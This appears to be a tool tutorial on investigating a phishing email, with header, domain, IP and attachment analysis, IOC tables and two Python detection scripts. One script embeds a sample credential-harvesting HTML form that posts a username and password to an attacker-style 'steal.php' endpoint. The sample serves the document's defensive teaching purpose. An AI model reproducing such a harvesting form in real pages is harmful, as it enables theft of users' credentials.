Phishing Investigation
A complete walkthrough of investigating a reported phishing email.
Scenario
A user forwards a suspicious email to the security team. The email claims to be from "IT Support" and asks the user to verify their account credentials.
What we'll cover:
- Initial analysis of the email
- Deep dive into headers and IOCs
- Checking threat intelligence
- Analyzing attachments
- Documenting findings
- Generating a report
Step 1: Create a Case
Start by creating an investigation case to track all evidence (the summary table at the end lists the command used in each step):
bsot case new
Step 2: Initial Email Analysis
Add the email to the case and perform initial analysis:
# Add email as evidence
bsot case add suspicious.eml
# Quick analysis
bsot phishing analyze suspicious.eml
Sample Output
Phishing Analysis: suspicious.eml
┌──────────────────────────────────────────────────────────┐
│ Risk Score: HIGH (8/10)                                  │
├──────────────────────────────────────────────────────────┤
│ From: "IT Support" <support@company-secure.net>          │
│ To: victim@yourcompany.com                               │
│ Subject: Urgent: Verify your account immediately         │
│ Date: 2025-01-15 09:15:32 UTC                            │
└──────────────────────────────────────────────────────────┘
⚠️ Authentication Failures
SPF: FAIL
DKIM: FAIL
DMARC: FAIL
URLs Found (1)
⚠️ hxxps://company-secure[.]net/verify?token=abc123
└─ Suspicious: Domain registered 3 days ago
Attachments (1)
verify_account.html (12.4 KB)
└─ ⚠️ HTML file with form elements
Extracted IOCs
Domains: company-secure.net
IPs: 185.234.72.45
Key findings:
- All email authentication failed (SPF, DKIM, DMARC)
- Suspicious domain registered recently
- HTML attachment with form (likely credential harvester)
Step 3: Analyze Email Headers
Get detailed header information:
bsot phishing headers suspicious.eml
Sample Output
── Authentication ────────────────────────────────────────
SPF: FAIL
DKIM: FAIL
DMARC: FAIL
Score: 0/100
── Sender Information ────────────────────────────────────
Header From: support@company-secure.net
Envelope From: bounce@mail.evil-server.ru
Reply-To: support@company-secure.net
[HIGH] From domain mismatch detected!
── Routing ───────────────────────────────────────────────
Mail hops: 2
Origin IP: 185.234.72.45 (evil-server.ru)
Key findings:
- Envelope-From domain is completely different (evil-server.ru)
- Origin IP is from Russia
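The header checks above (authentication verdicts, header-From versus envelope-From mismatch, origin IP from the earliest Received hop), as an added Python example that is not part of bsot or this walkthrough. It parses a constructed message with the standard-library email module and assumes the receiving MX wrote a single Authentication-Results header:

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample .eml mirroring the walkthrough's indicators (not a real capture).
SAMPLE_EML = """\
Return-Path: <bounce@mail.evil-server.ru>
Received: from mail.evil-server.ru (mail.evil-server.ru [185.234.72.45])
 by mx.yourcompany.com with ESMTP; Wed, 15 Jan 2025 09:15:32 +0000
Authentication-Results: mx.yourcompany.com; spf=fail smtp.mailfrom=mail.evil-server.ru;
 dkim=fail; dmarc=fail header.from=company-secure.net
From: "IT Support" <support@company-secure.net>
Reply-To: support@company-secure.net
To: victim@yourcompany.com
Subject: Urgent: Verify your account immediately
Date: Wed, 15 Jan 2025 09:15:32 +0000
"""

def domain_of(header_value):
    """Lowercase domain of the first address in a header, or '' if absent."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()

def auth_results(msg):
    """Extract spf/dkim/dmarc verdicts from the MX's Authentication-Results header."""
    joined = " ".join(str(h) for h in msg.get_all("Authentication-Results", []))
    verdicts = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", joined, re.IGNORECASE)
        verdicts[mech] = m.group(1).lower() if m else "none"
    return verdicts

def origin_ip(msg):
    """The bottom-most Received header was added first, i.e. closest to the sender."""
    hops = msg.get_all("Received", [])
    m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", str(hops[-1])) if hops else None
    return m.group(1) if m else None

def analyze_headers(raw_eml):
    msg = email.message_from_string(raw_eml, policy=policy.default)
    header_from, envelope_from = domain_of(msg["From"]), domain_of(msg["Return-Path"])
    verdicts = auth_results(msg)
    failed = [k.upper() for k, v in verdicts.items() if v != "pass"]
    findings = ["authentication failed: " + ", ".join(failed)] if failed else []
    if envelope_from and envelope_from != header_from:
        findings.append(f"[HIGH] From domain mismatch: header {header_from} vs envelope {envelope_from}")
    return {"header_from": header_from, "envelope_from": envelope_from,
            "reply_to": domain_of(msg["Reply-To"]), "origin_ip": origin_ip(msg),
            "auth": verdicts, "findings": findings}
```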
Step 4: Domain Intelligence
Check the suspicious domain:
bsot intel whois company-secure.net
Sample Output
── WHOIS: company-secure.net ─────────────────────────────
── Registrar ─────────────────────────────────────────────
Namecheap, Inc.
── Dates ─────────────────────────────────────────────────
Created: 2025-01-12
Age: 3 days
[HIGH] Domain is only 3 days old - likely malicious
── Registrant ────────────────────────────────────────────
WHOIS Privacy Protection: Enabled
The domain was registered just 3 days ago: classic phishing infrastructure.
Step 5: IP Enrichment
Enrich the origin IP:
bsot intel enrich 185.234.72.45
Sample Output
Enriching ip: 185.234.72.45
VERDICT: MALICIOUS
CONFIDENCE: 92%
Sources: 3 malicious, 0 suspicious, 1 clean
Country: Russia
ASN: AS12345 Bulletproof Hosting Ltd
Tags: phishing, spam, botnet
── Source Details ────────────────────────────────────────
VIRUSTOTAL: MALICIOUS
Detection: 8/90
ABUSEIPDB: MALICIOUS
Abuse Score: 100%
Reports: 847
Confirmed malicious IP with extensive abuse history.
Step 6: Analyze Attachment
Check the HTML attachment:
bsot file strings verify_account.html
The HTML file is a credential harvesting page that posts to steal.php.
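As an added example (not bsot's own code), a small Python scanner for the kind of HTML attachment described above: it lists every form, its action endpoint and input fields, and flags any form that collects a password. The sample HTML is constructed to mirror the walkthrough, including the steal.php endpoint:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for verify_account.html (not the page's real attachment).
SAMPLE_HTML = """<html><body>
<h2>IT Support - Account Verification</h2>
<form method="post" action="https://company-secure.net/steal.php">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Verify">
</form>
</body></html>"""

class FormScanner(HTMLParser):
    """Collect every <form> with its action, method and input fields."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # valueless attributes arrive as None, hence the "or" defaults
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "method": (a.get("method") or "get").lower(), "fields": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["fields"].append((a.get("name") or "", (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def scan_html_attachment(html):
    """Return one finding per form; a form with a password field is a credential harvester."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for form in scanner.forms:
        field_types = [t for _, t in form["fields"]]
        host = urlparse(form["action"]).netloc.lower()  # '' for a relative action
        verdict = "credential harvester" if "password" in field_types else "form without credentials"
        findings.append({"action": form["action"], "host": host, "method": form["method"],
                         "fields": form["fields"], "verdict": verdict})
    return findings
```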
Step 7: Document Timeline
Add timeline events:
bsot case timeline "Phishing email received by user" --time "2025-01-15 09:15:00"
bsot case timeline "User forwarded email to security team" --time "2025-01-15 09:45:00"
bsot case timeline "Analysis confirmed credential harvesting attempt"
Step 8: Add Investigation Notes
bsot case note "Confirmed phishing attack targeting company credentials"
bsot case note "Attacker infrastructure: company-secure.net (registered 3 days ago)"
bsot case note "No evidence user clicked link or submitted credentials"
bsot case note "Recommend blocking domain at email gateway and proxy"
Step 9: Generate Report
Generate a report for stakeholders:
# Executive summary for management
bsot report generate --template executive -o executive_summary.md
# Technical report with IOCs
bsot report generate --template technical -o technical_report.md
# Export IOCs for blocklists
bsot report ioc --format csv -o iocs.csv
Step 10: Close the Case
Close the case once the findings and reports are recorded:
bsot case close
Summary
| Step | Command | Purpose |
|---|---|---|
| 1 | bsot case new | Create investigation case |
| 2 | bsot phishing analyze | Initial email analysis |
| 3 | bsot phishing headers | Detailed header inspection |
| 4 | bsot intel whois | Domain age and registration |
| 5 | bsot intel enrich | IP reputation check |
| 6 | bsot file strings | Attachment analysis |
| 7 | bsot case timeline | Document timeline |
| 8 | bsot case note | Add findings |
| 9 | bsot report generate | Create reports |
| 10 | bsot case close | Close investigation |
Indicators of Compromise
| Type | Value | Description |
|---|---|---|
| Domain | company-secure.net | Phishing domain |
| IP | 185.234.72.45 | Mail server origin |
| URL | hxxps://company-secure[.]net/verify | Credential harvester |
| Email | support@company-secure.net | Sender address |
Recommendations
- Block the domain at email gateway and web proxy
- Block the IP at firewall
- User awareness: remind users about phishing indicators
- Password reset: if the user submitted credentials
- Monitor: watch for similar patterns